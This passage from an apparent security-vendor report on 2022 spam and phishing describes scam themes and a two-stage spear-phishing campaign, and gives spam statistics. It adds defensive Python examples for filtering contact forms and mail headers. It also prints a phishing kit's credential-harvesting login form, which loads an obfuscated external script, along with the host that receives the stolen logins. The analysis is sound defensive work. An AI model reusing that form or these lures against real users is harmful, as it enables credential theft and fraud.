COVID-themed scheme, the con artists introduced themselves as the Direct Relief charity, which helps to improve the quality of life and healthcare in poorer regions. Visitors were invited to fill out a form to be eligible for $750 per week in aid for twenty-six weeks. The survey page said the "charity" found the victim's telephone number in a database of individuals affected by COVID-19. 
Those who wished to receive the "aid" were asked to state their full name, contact details, date of birth, social security and driver's license numbers, gender, and current employer, and to attach a scanned copy of their driver's license. To lend an air of authenticity and to motivate the victim to enter valid information, the swindlers warned that the victim could be prosecuted for providing false information. The scheme was most likely aimed at identity theft: the illegal use of other people's personal details for profit. The cybercrooks might also use the data to contact their victims later and stage a more convincing swindle.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141841/spam-phishing-report-2022-07.png>)

### Crypto phishing and crypto scams

The unabated popularity of cryptocurrency kept crypto scammers interested in wallet owners' accounts, even though exchange rates continued to drop throughout the year. Cybercriminals chased seed phrases, which are used for recovering access to virtual funds. By obtaining a user's seed phrase, cybercriminals could gain access to their cryptocurrency balance.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141926/spam-phishing-report-2022-08.png>)

In typical internet-hoax fashion, crypto scam sites offered visitors the chance to get rich quick by paying a small fee. Unlike common easy-money scams, these websites asked for payments in cryptocurrency, the very thing they promised to give away and were actually trying to steal. The "giveaways" were timed to coincide with events that were directly or indirectly associated with cryptocurrency. For example, one of the fake sites promised prizes on the occasion of Nvidia's thirtieth anniversary (the company is a major vendor of graphics processing units, which are sometimes used for crypto mining). Promoting cryptocurrency adoption was another pretext for the "giveaways".
Users were invited to deposit up to 100 cryptocurrency units against a promise to return twice that amount, purportedly to speed up digital currency adoption. In reality, the scheme worked the way any other internet hoax would: the self-professed altruists went off the radar as soon as they received the deposit.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142443/spam-phishing-report-2022-09.png>)

### Compensation, bonus, and paid survey scams

Bonuses and compensation are hard to turn down in times of crisis and instability, but it is worth keeping in mind that "financial assistance" is frequently promised by con artists to swindle you out of your money.

"Promotional campaigns by major banks" were a popular bait in 2022. Visitors to a fraudulent web page were offered a one-time payment or a fee for taking a service quality survey. Unlike the prizes offered in the crypto schemes described above, these sums were smaller: the equivalent of $30–40. The cybercriminals used an array of techniques to lull victims' vigilance: company logos, assurances that the campaigns were legitimate, and detailed, lifelike descriptions of the offer. Similar "campaigns" were staged in the name of other types of organizations, for example the Polish finance ministry.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142523/spam-phishing-report-2022-10.png>)

Aid distributed by various governmental and nongovernmental organizations remained a popular fraud theme in 2022. For example, in Muslim countries scammers promised to send charity packages, purportedly under a "Ramadan Relief" program aimed at helping low-income families during the Ramadan fast. The fasting period typically sees higher prices for food and household products, while those observing it buy more than they normally do and may find themselves short of money.
Legitimate charities, such as [WF-AID](<https://wfaid.org/rrf/>), do operate Ramadan relief programs, and judging by the screenshot below, the fraudsters were pretending to represent that organization. An eye-catching picture of the organization's logo and huge boxes was accompanied by a list of the foodstuffs included in the aid package, with positive "recipient feedback" posted below the message. The victim was asked to make sure their name was on the list of recipients so that they could get a package. This required providing personal data on the website and sending a link to the scam site to instant messaging contacts, nothing extraordinary for hoaxes like this. This way, the scammers both populate their databases and have victims spread links to their malicious resources for them. On top of that, they might ask the victim to cover the "shipping costs".

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142600/spam-phishing-report-2022-11.png>)

Growing utility rates and rising prices for natural resources prompted several governments to start discussing compensation for the population. Payout notices could arrive by post, email, or text message. Cybercriminals attempted to take advantage of the situation by creating web pages that mimicked government websites and promised cash to cover utility payments or compensate utility expenses. Visitors were sometimes asked to provide personal details under the pretext of checking that they were eligible, or simply to fill out a questionnaire. In Britain, con artists posing as a government authority promised to compensate electricity costs. The description of the one-time payout was copied from the official website of the authority, which did provide that type of compensation.
After completing the questionnaire, the victim was asked to specify the electric utility whose services they were using and to enter the details of the bank card linked to their account with that utility. The promise of £400 was supposed to make the victim drop their guard and share their personal information.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142636/spam-phishing-report-2022-12.png>)

In Singapore, scammers offered a refund of water supply costs, purportedly because of double billing. An energy or resource crisis was not used as a pretext in this particular case, but refunds were still offered in the name of the water supply authority.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142706/spam-phishing-report-2022-13.png>)

### Fake online stores and large vendor phishing

We see fake websites that imitate large online stores and marketplaces year after year, and 2022 was no exception. Phishing attacks targeted the customers of both globally known retailers and regional players. An attack often started with the victim receiving a link, by email, in an instant messaging app, or on a social network, to a certain product supposedly offered at an attractive price. Those who fell for the trick could lose access to their accounts, have their bank card details stolen, or lose the money they wanted to spend on the dirt-cheap item.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142737/spam-phishing-report-2022-14.png>)

"Insider information" about "private sales" was also used as a lure. For example, a web page that copied the appearance of a Russian marketplace promised discounts of up to 90% on all items listed on it.
The page design looked credible; the only potential red flags were the unrealistically low prices and the URL in the address bar not matching the official one.

Many large vendors, notably in the home appliances segment, announced in early spring that they would be pulling out of Russia, which caused a spike in demand. This was reflected in the threat landscape, with fake online stores offering home appliances popping up all over the Russian segment of the internet (also called Runet). Large retailers being out of stock, combined with unbelievably low prices, made these offers especially appealing. The risk of making a purchase was losing a substantial amount of money and never receiving what was ordered.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142817/spam-phishing-report-2022-15.jpg>)

### Hijacking of social media accounts

Users of social media have increasingly focused on privacy lately. That said, curiosity is hard to contain: people want to check out who has been following them, but without the other party knowing. Cybercriminals who were after their account credentials offered victims a way to have their cake and eat it by using some new social media capability. A fake Facebook Messenger page promised to install an update that could change the user's appearance and voice during video calls and track who had been viewing their profile, among other features. To get the "update", the victim was asked to enter their account credentials, which the scammers immediately took over.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142852/spam-phishing-report-2022-16.png>)

Many Instagram users dream of the Blue Badge, which marks a verified account and is typically reserved for large companies or media personalities.
Cybercriminals decided to take advantage of that exclusivity, creating phishing pages that assured visitors their verified status had been approved and all they needed to do was enter their account logins and passwords.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142919/spam-phishing-report-2022-17.png>)

Russia blocked access to both Facebook and Instagram in March 2022, which made the popularity of Russian social networks and Telegram skyrocket. This increased usage meant that the users' risk of losing personal data was higher too. "Well-wishers" who operated scam sites offered to check whether Russian social media contained any embarrassing material on the victim. The scam operators told users that damaging information could be found on every third user of a social network by running a search. If the user agreed to have a search done for them, they were told that a certain amount of dirty linen had indeed been found. In reality, there was no search: the scammers simply stole the credentials they had requested for the check.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142944/spam-phishing-report-2022-18.png>)

One of the added risks of social media phishing is scammers gaining access to both the social media account itself and any linked services.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143155/spam-phishing-report-2022-19.png>)

Telegram Premium status provides a range of benefits, from an ad-free experience to the ability to block incoming voice messages, but the subscription costs money.
Scammers offered to let victims "test" a Premium subscription free of charge, or simply promised to give one away for free, if the victim entered their Telegram user name and password or a verification code sent by the service, which was exactly what the cybercrooks were after.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143228/spam-phishing-report-2022-20-EN.png>)

One more phishing campaign targeting Telegram users was timed to coincide with the New Year's celebrations. Scammers created a page on the telegra.ph blogging platform with a gallery of children's drawings, encouraging users to vote for their favorites. They sent links to that page from hacked accounts, asking users to vote for their friends' kids' work. Those who took the bait were directed to a fake page with a login form on it. The cybercriminals were betting on users going straight to the vote without checking the authenticity of the drawings, which had been copied from various past years' competition pages, since requests to vote for friends' kids are common before public holidays.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143725/spam-phishing-report-2022-21.jpg>)

Telegram's auction platform, Fragment, went live in October 2022 to sell unique usernames. You can become a user by linking your Telegram account or TON wallet. Scammers who were after those account details sent out links to fake Fragment pages. A visitor who tried to buy a username from the fake website was asked to log in. If the victim entered their credentials, the scam operators immediately grabbed them.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143807/spam-phishing-report-2022-22.png>)

## Spam in 2022

### The pandemic

Unlike phishing, COVID-themed spam is still a thing.
Most of it is "Nigerian-type" scams: millionaires dying of COVID and bequeathing their money to treatment and prevention efforts and to improving the lives of those who have recovered, or Mark Zuckerberg running a special COVID lottery in which one can win a million euros even without being a Facebook user. Recipients are told that they can claim IMF money left unallocated because of the pandemic. Others are offered hefty sums under an anti-recession assistance program.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143915/spam-phishing-report-2022-23.png>)

The amount of spam exploiting the coronavirus theme in some way dropped noticeably during 2022: at the beginning of the year we were blocking a million of these emails per month, but the figure had shrunk threefold by year-end.

### Contact form spam

In 2022, cybercriminals abused contact forms for spam more frequently. In a typical scheme of this kind, scammers find websites with registration, contact, or support request forms that do not require the user to be logged in to submit and do not check the data entered. In some cases they insert a scam message with a hyperlink in the login or name field; in others they add a longer text with images to the message field. The attackers then enter the victims' email addresses in the contact fields and submit the form. When a message arrives via a registration or contact form, most websites reply to the user's email address that their request has been received and is being processed, that their account has been created, and so on. As a result, the victim receives an automated reply from an official address of a legitimate organization containing unsolicited advertisements or a scam link.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13144349/spam-phishing-report-2022-24.png>)

Most scam messages offer the recipient compensation or a prize.
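The contact-form abuse described above works only because the site echoes unchecked fields back in its auto-reply. The following is an added illustration, not code from the report, of the two server-side measures that break the scheme: reject submissions whose short fields carry links or markup, and build the confirmation mail from a fixed template that never repeats user-supplied text. The thresholds, patterns and sample submissions are constructed for this example.

```python
import re
import secrets

# The thresholds and patterns below are assumptions made for this example.
LINK_RE = re.compile(
    r"https?://\S+|www\.\S+|\b[\w-]+\.(?:com|net|org|ru|info|xyz|top)\b", re.IGNORECASE
)
MAX_SHORT_FIELD = 64
SHORT_FIELDS = ("name", "login", "company")


def submission_problems(form):
    """Return the reasons a submission should be rejected before any auto-reply is sent."""
    problems = []
    for field in SHORT_FIELDS:
        value = form.get(field, "")
        if len(value) > MAX_SHORT_FIELD:
            problems.append(f"{field}: longer than {MAX_SHORT_FIELD} characters")
        if LINK_RE.search(value):
            problems.append(f"{field}: contains a link or domain name")
        if re.search(r"[<>\r\n]", value):
            problems.append(f"{field}: contains markup or line breaks")
    message = form.get("message", "")
    # A support request may contain a link, but several links or inline images are a spam signal.
    if len(LINK_RE.findall(message)) > 2 or "<img" in message.lower():
        problems.append("message: link- or image-heavy")
    return problems


def auto_reply(form):
    """Build the confirmation email from a fixed template that echoes no user-supplied text.

    The submitter's address is the only field that reaches the outgoing mail; name,
    subject and message stay server-side under a generated ticket id. Returns None
    when the submission is rejected, so nothing is sent to an address the submitter chose.
    """
    if submission_problems(form):
        return None
    ticket = secrets.token_hex(4)
    return {
        "to": form["email"],
        "subject": f"Your request has been received (ticket {ticket})",
        "body": (
            f"Thank you for contacting us. Your request was registered as ticket {ticket} "
            "and will be answered from this address."
        ),
    }


# Constructed submissions: the first mimics the abuse pattern (scam text and link in the
# name field, the victim's address in the email field), the second is an ordinary request.
SPAM_SUBMISSION = {
    "name": "Claim your prize: http://prize.example/claim",
    "email": "victim@example.com",
    "message": "see link",
}
NORMAL_SUBMISSION = {
    "name": "Jane Doe",
    "email": "jane@example.com",
    "message": "Question about invoice 123",
}

if __name__ == "__main__":
    print(submission_problems(SPAM_SUBMISSION))
    print(auto_reply(SPAM_SUBMISSION))
    print(auto_reply(NORMAL_SUBMISSION))
```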
One such spam email, targeting Russian users, promised the equivalent of $190–4200 in VAT refunds. To get the money, the victim was invited to open the link in the message. The scheme is a classic: the linked web page asks the user to pay a commission of under a dozen dollars, which is insignificant in comparison with the promised refund. We observed many varieties of contact form money scam, from fuel cards to offers to make money on some online platform.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13145016/spam-phishing-report-2022-25.png>)

Scammers took advantage of forms on legitimate sites all around the world. Where spam email in Russian typically played on "prizes" or "earning money", messages in other languages, in addition to offering "prizes", encouraged users to visit "dating sites", in fact populated by bots, where the victims would no doubt be asked to pay for a premium account.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150322/spam-phishing-report-2022-26.png>)

We blocked upward of a million scam emails sent via legitimate forms in 2022.

### Blackmail in the name of law enforcement agencies

Extortion spam is nothing new. In such emails, attackers usually claim that the recipient has broken the law and demand money. In 2022, these mailings not only continued but also evolved. For example, there was virtually no text in the messages: the user was either asked to open an attached PDF file to find out more, or received threats in the form of an image containing text.
In addition, the geography of these mailings widened in 2022.

The gist of the message, as in similar emails sent earlier, was that a criminal case was going to be opened against the recipient for allegedly visiting sites containing child pornography.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150404/spam-phishing-report-2022-27.png>)

To avoid serious consequences, the attackers urged the victim to respond to the sender as soon as possible and "settle the matter". Most likely, in further correspondence the scammers would ask for a certain sum to be paid for the victim's name to be removed from the "criminal case". In 2022, we blocked over 100,000 blackmail emails in various countries and languages, including French, Spanish, English, German, Russian and Serbian.

### Exploiting the news

Spammers constantly use major world events in their fraudulent schemes, and the 2022 geopolitical crisis was no exception. Throughout the year, we saw mailings aimed at English-speaking users that proposed transferring money, usually to a Bitcoin wallet, to help the victims of the conflict in Ukraine. Scammers often demand payment to Bitcoin wallets because tracing the recipient of a cryptocurrency transaction is harder than tracing a bank transfer. Demands for payment in cryptocurrency used to be the domain of blackmail spam; now attackers have started collecting Bitcoin for "charity" as well.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150431/spam-phishing-report-2022-28.png>)

The news agenda was also used in other scam mailings. For example, in early July our solutions blocked 300,000 emails in which fraudsters requested help on behalf of a Russian millionaire who allegedly wanted to invest money and avoid sanctions.
Another mailing said that the European Commission had decided to give away a fund created by Russian oligarchs, and that the email recipient might be lucky enough to get a piece of the pie.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150458/spam-phishing-report-2022-29.jpg>)

More and more "business offers" exploiting the current news agenda are appearing among spam mailings. Because of the economic sanctions in 2022, enterprising businessmen offered replacements for goods and services from suppliers that had left the Russian market. For example, spammers actively advertised the services of a company transporting people to Russia; the email text emphasized that many transport companies had refused to provide such services.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153541/spam-phishing-report-2022-30.png>)

There were also spam mailings in which various companies offered to replace popular international software with Russian equivalents or with solutions developed in third countries. In addition, there were spam offers of intermediary services for opening a company or bank account in neighboring countries such as Armenia, as well as offers of assistance in accepting payments from foreign partners.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153600/spam-phishing-report-2022-31.png>)

The shortage of printer paper in Russia in March and April 2022 spawned a wave of related ads offering paper at discount prices.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153622/spam-phishing-report-2022-32.png>)

Spammers in 2022 also actively marketed their promotional mailing services as an alternative to advertising on platforms that had become unavailable, such as Instagram.
For example, in April we blocked around a million such mailings.

Against the backdrop of sanctions and the accompanying disruption of supply chains, there was an increase in spam offering goods and services from Chinese suppliers. In 2022, our filter blocked more than 3.5 million emails containing such offers, and their number kept growing, from around 700,000 in the first quarter to more than a million in the fourth.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153708/spam-phishing-report-2022-33.png>)

### Spam with malicious attachments

The shift to remote work during the pandemic and the associated growth of online communications spurred the active development of various kinds of phishing, both mass and targeted. Attackers have become more active in imitating business correspondence, targeting not only HR specialists and accountants, as before the pandemic, but also employees in other departments. In 2022, we saw malicious emails masquerading as business correspondence evolve. Attackers actively used social engineering techniques in their emails: adding signatures with logos and information from specific organizations, creating a context appropriate to the company's profile, and using business language. They also actively exploited the current news agenda and mentioned real employees of the company supposedly sending the emails. Spammers disguised their messages as internal company correspondence, business correspondence between different organizations, and even notifications from government agencies.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153731/spam-phishing-report-2022-34.png>)

Disguising malicious emails as business correspondence became a major trend in malicious spam in 2022.
Attackers tried to convince the recipient that the email was legitimate, such as a commercial offer, a request for the supply of equipment, or an invoice for goods. For example, throughout the year we encountered the following scheme: attackers gained access to real business correspondence (most likely by stealing it from previously infected computers) and sent malicious files or links to all of its participants in reply to the previous email. This trick makes malicious emails harder to spot, and the victim is more likely to fall for it.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153756/spam-phishing-report-2022-35.png>)

In most cases, either the [Qbot](<https://securelist.com/qakbot-technical-analysis/103931/>) Trojan or [Emotet](<https://securelist.com/emotet-modules-and-recent-attacks/>) was loaded when the malicious document was opened. Both can be used to steal user data, collect information about the corporate network, and spread additional malware, such as ransomware. Qbot also allows the attackers to access emails and steal them for use in further attacks.

Mailings imitating notifications from various ministries and other government organizations became more frequent on the Runet. The emails were often designed with the specific activities of the organizations they impersonated in mind. The sender addresses copied the logic of the email addresses used by the relevant agencies, and the malicious attachment was disguised as some kind of specialized document, such as "key points of the meeting". For example, malicious code found in one of these mailings exploited a vulnerability in the Equation Editor module, the formula editor in Microsoft Office.

The perpetrators did not ignore the news agenda either.
In particular, malware was distributed under the guise of call-up papers "as part of partial mobilization" or as a "new solution" to safeguard against possible threats on the internet "caused by hostile organizations".

In the second case, the program installed on the victim's computer was in fact a crypto-ransomware Trojan.

## Two-stage spear phishing using a known phish kit

In 2022, we saw an increase in spear (or targeted) phishing attacks on businesses around the world. In addition to the typical single-stage campaigns, there were attacks in several stages. In the first email, scammers posing as a potential client asked the victim to provide information about its products and services. Once the victim responded to this email, the attackers started the phishing attack proper.

Key facts:

 * Attackers use fake Dropbox pages created with a well-known phishing kit
 * The campaign targets the sales departments of manufacturers and suppliers of goods and services
 * Attackers use SMTP IP addresses and _From_ domains provided by Microsoft Corporation and Google LLC (Gmail)

### Statistics

The campaign began in April 2022, with malicious activity peaking in May, and had ended by June.

_Number of emails related to the two-stage targeted campaign detected by Kaspersky solutions ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161029/01-en-spam-report-2022-diagrams.png>))_

### How the phishing campaign unfolds

Attackers send an email in the name of a real trade organization requesting more information about the victim company's products. The email text looks plausible and has no suspicious elements such as phishing links or attachments. A sender address in a free domain such as gmail.com, however, may raise doubts.
The email in the screenshot below was sent from a gmail.com address, and the company name in the _From_ field differs from the name in the signature.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153835/spam-phishing-report-2022-36.jpg>)

**_Example of the first email_**

It is worth noting that the use of free domains is not typical for spear phishing in the name of organizations, because such domains are rarely used in business. Most often in targeted attacks, attackers either [spoof the legitimate domain](<https://securelist.com/email-spoofing-types/102703/>) of the organization they are pretending to be, or register domains similar to the original one. In addition, Google and Microsoft are fairly quick to block email addresses spotted sending spam. This is the most likely reason the attackers used different addresses in the _From_ header (where the email came from) and the _Reply-To_ header (where the reply goes when you click "Reply" in your email client). This means the victim responds to another address, which may be located in another free domain, such as outlook.com. The address in the _Reply-To_ header is not used for sending spam, and correspondence with it is initiated by the victim, so it is less likely to be blocked quickly.

After the victim responds to the first email, the attackers send a new message asking them to go to a file-sharing site and view a PDF file with a completed order, which can be found via the link.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153858/spam-phishing-report-2022-37.jpg>)

**_An email with a phishing link_**

Clicking the link takes the user to a fake site generated by a well-known phishing kit. It is a fairly simple tool that generates phishing pages to steal credentials for specific resources.
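The header tells described for this campaign (a company writing from a free-mail domain, a _Reply-To_ pointing at a different mailbox, a _From_ name that does not match the signature, and a second-stage link that names a file-sharing service but leads elsewhere) can be checked mechanically at the mail gateway. The code below is an added example, not from the report or from Kaspersky; the free-mail list, the brand domains and the three sample messages are constructed for it.

```python
import email
import re
from email import policy
from email.utils import parseaddr

# Assumptions for this example: a short list of free-mail domains and the
# legitimate domains of the two file-sharing brands the kit imitated.
FREE_MAIL_DOMAINS = {"gmail.com", "outlook.com", "hotmail.com", "yahoo.com"}
BRAND_DOMAINS = {"dropbox": "dropbox.com", "wetransfer": "wetransfer.com"}
URL_HOST_RE = re.compile(r"https?://([^/\s]+)", re.IGNORECASE)

# Constructed samples (not captures from the campaign). Stage one asks for a
# quotation; stage two, sent after the victim replies, carries the link.
STAGE_ONE = """\
From: Acme Trading Ltd <acme.trading.sales@gmail.com>
Reply-To: acme.trading.orders@outlook.com
To: sales@victim.example
Subject: Request for quotation

Hello,
Could you send us your current catalogue and price list?
Best regards,
John Smith
Purchasing Manager
Globex Supplies GmbH
"""

STAGE_TWO = """\
From: Acme Trading Ltd <acme.trading.sales@gmail.com>
Reply-To: acme.trading.orders@outlook.com
To: sales@victim.example
Subject: Re: Request for quotation

Thank you. The completed order form is shared via Dropbox:
https://files-share.example.net/order.pdf
Acme Trading Ltd
"""

BENIGN = """\
From: Globex Supplies GmbH <purchasing@globex.example>
To: sales@victim.example
Subject: Request for quotation

Hello,
Please send us your catalogue.
Regards,
Jane Doe, Globex Supplies GmbH
"""


def _domain(header_value):
    """Lower-cased domain of the first address in a header value ('' if absent)."""
    _, addr = parseaddr(str(header_value or ""))
    return addr.rpartition("@")[2].lower()


def _plain_text(msg):
    part = msg.get_body(preferencelist=("plain",))
    return part.get_content() if part is not None else ""


def header_findings(raw_message):
    """Return the heuristic codes raised by one RFC 5322 message (empty list = nothing odd)."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    findings = []
    from_domain = _domain(msg["From"])
    reply_domain = _domain(msg["Reply-To"])
    display_name, _ = parseaddr(str(msg["From"] or ""))
    text = _plain_text(msg)

    # 1. A company writing from a free-mail domain is unusual in business mail.
    if from_domain in FREE_MAIL_DOMAINS:
        findings.append("free-mail-from")
    # 2. Replies silently redirected to a different mailbox, often another free-mail one.
    if reply_domain and reply_domain != from_domain:
        findings.append("reply-to-mismatch")
        if reply_domain in FREE_MAIL_DOMAINS:
            findings.append("free-mail-reply-to")
    # 3. The company named in From should reappear in the signature (last lines of the body).
    signature = " ".join(text.strip().splitlines()[-5:]).lower()
    if display_name and display_name.strip().lower() not in signature:
        findings.append("from-name-absent-from-signature")
    # 4. Stage two: the text names a file-sharing brand, but the link leads elsewhere.
    lowered = text.lower()
    for brand, legit_domain in BRAND_DOMAINS.items():
        if brand not in lowered:
            continue
        for host in URL_HOST_RE.findall(text):
            host = host.lower().split(":")[0]
            if host != legit_domain and not host.endswith("." + legit_domain):
                findings.append(f"{brand}-link-off-brand:{host}")
    return findings


if __name__ == "__main__":
    for label, sample in (("stage one", STAGE_ONE), ("stage two", STAGE_TWO), ("benign", BENIGN)):
        print(f"{label}: {header_findings(sample) or 'no findings'}")
```

Any one finding is weak on its own; the combination the campaign exhibits (free-mail _From_ plus a mismatched free-mail _Reply-To_ and a signature naming a different company) is what merits holding the message for review.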
Our solutions blocked fake WeTransfer and Dropbox pages created with this kit.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153925/spam-phishing-report-2022-38.jpg>)

**_A fake WeTransfer page created using the same phish kit as the target campaign sites_**

In the phishing campaign described above, the phishing site mimics a Dropbox page with static file images and a download button. After clicking any element of the interface, the user is taken to a fake Dropbox login page that requests valid corporate credentials.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153950/spam-phishing-report-2022-39.png>)

**_A fake Dropbox page_**

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154022/spam-phishing-report-2022-40.jpg>)

**_Login page with a phishing form_**

When victims attempt to log in, their usernames and passwords are sent to https://pbkvklqksxtdrfqkbkhszgkfjntdrf[.]herokuapp[.]com/send-mail. Note that the form below has no `action` attribute: the submission is handled by the externally hosted, obfuscated script referenced at the end.

```html
<form name="loginform">
  <div class="form-group">
    <label for="">Email Address</label>
    <input type="email" id="email" class="form-control" name="email" placeholder="email Address">
    <div class="email-error"></div>
  </div>
  <div class="form-group">
    <label for="">Password</label>
    <input type="password" id="password" class="form-control" name="password" placeholder="Password">
    <div class="password-error"></div>
  </div>
  <div class="form-group btn-area">
    <button class="download-btn" id="db" type="submit">Download</button>
  </div>
</form>
</div>
<script src="https://firebasestorage.googleapis.com/v0/b/linktopage-c7fd6.appspot.com/o/obfuscated.js?alt=media&token=1bb73d28-53c8-4a1e-9b82-1e7d62f3826b"></script>
```

**_HTML representation of a phishing form_**

### Victims

We identified targets of this campaign around the world, including in the following countries: Russia, Bosnia
and Herzegovina, Singapore, USA, Germany, Egypt, Thailand, Turkey, Serbia, Netherlands, Jordan, Iran, Kazakhstan, Portugal, and Malaysia.

## Statistics: spam

### Share of spam in mail traffic

In 2022, an average of 48.63% of emails worldwide were spam, a 3.07 p.p. increase on 2021. Over the course of the year, however, the share of spam in global email traffic gradually declined, from 51.02% in the first quarter to 46.16% in the fourth.

_Share of spam in global email traffic, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161102/02-en-spam-report-2022-diagrams.png>))_

The most active month in terms of spam was February 2022, with junk traffic accounting for 52.78% of all email correspondence. June was in second place (51.66%). December was the calmest: only 45.20% of emails that month were spam.

On the Runet, the proportion of spam in email traffic is generally higher than worldwide. In 2022, an average of 52.44% of emails were junk mailings. At the same time, the trend of a gradual shift in favor of legitimate correspondence can be seen there too. The largest share of spam on the Runet was in the first quarter, at 54.72% of all emails, and by the fourth quarter it had dropped to 49.20%.

_Proportion of spam in Runet email traffic, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161132/03-en-spam-report-2022-diagrams.png>))_

Even though the second quarter (53.96%) was quieter in terms of spam than the first, the most active month in the Russian segment of the internet was June (60.16%). Most likely, the share of spam in June, both in Russia and globally, was influenced by the surge in mailings with offers from Chinese factories that we observed that month.
The quietest month on the Runet was December (47.18%), as it was globally.

### Countries and territories — sources of spam

In 2022, the share of spam from Russia continued to grow, from 24.77% to 29.82%. Germany (5.19%) swapped places with mainland China (14.00%), whose share increased by 5.27 percentage points. Third place is still held by the United States (10.71%).

_TOP 20 countries and territories — sources of spam, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161204/04-en-spam-report-2022-diagrams.png>))_

The Netherlands remained in fifth place (3.70%), although its share decreased compared to 2021. Sixth and seventh places went to Japan (3.25%) and Brazil (3.18%), whose shares rose by 0.89 and 3.77 p.p., respectively. Next come the UK (2.44%), France (2.27%) and India (1.82%).

### Malicious mail attachments

In 2022, our Mail Anti-Virus detected 166,187,118 malicious email attachments, an increase of 18 million on the previous year. The component triggered most often in March, May, and June 2022.

_Number of Mail Anti-Virus hits, January — December 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161240/05-en-spam-report-2022-diagrams.png>))_

The most common malicious email attachments in 2022, as in 2021, were [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) Trojan stealers (7.14%), whose share decreased slightly. [Noon](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) spyware (4.89%) moved up to second place, and [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) Trojans (4.61%), which spread as archived electronic documents, moved down to third place. The fourth most common malware was exploits for [CVE-2018-0802](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (4.33%), a vulnerability in Microsoft Equation Editor.
In 2022, attackers used CVE-2018-0802 exploits significantly more often than exploits for [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) (1.80%), a vulnerability in the same component; the latter were more widespread in 2021 but dropped to tenth place in 2022.\n\n_TOP 10 malware families spread by email attachments in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161308/06-en-spam-report-2022-diagrams.png>))_\n\n[ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) Trojans (3.27%), sent in the form of disk images, moved up to number five, and the sixth most common was the [Guloader](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Guloader/>) downloader family (2.65%), which delivers remotely controlled malware to victims' devices. They are closely followed by the [Badur](<https://threats.kaspersky.com/en/threat/Trojan.PDF.Badur/>) family (2.60%), PDF files containing links to web resources with questionable content, and in eighth place is the infamous [Emotet](<https://securelist.com/emotet-modules-and-recent-attacks/106290/>) botnet (2.52%). Law enforcement shut this down in early 2021, but by fall, attackers had restored the infrastructure and were actively distributing it in 2022. More recently, Emotet has been used to deliver other malware to victims' devices, particularly ransomware. The ninth most popular family was [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) (2.10%), which creates malicious tasks in the task scheduler.\n\n_TOP 10 types of malware spread by email attachments in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161339/07-en-spam-report-2022-diagrams.png>))_\n\nThe list of the most common malware sent via email usually corresponds to the list of families. 
